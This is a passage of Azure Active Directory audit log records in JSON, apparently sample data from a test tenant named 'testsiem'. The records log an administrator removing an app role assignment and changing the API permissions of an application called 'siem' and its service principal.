"Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.5873254Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492828"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "fe115c66-3e08-4ab4-8a00-84ae25a59078"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:52", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "5345f95e-44e0-48fc-823c-8206ff821338"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:52.6473040Z"}, {"Name": "env_epoch", "Value": "FQXLK"}, {"Name": "env_seqNum", "Value": "42492835"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR565"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "76f9b173-c35c-4dbb-b5f7-64750ae994ce"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": 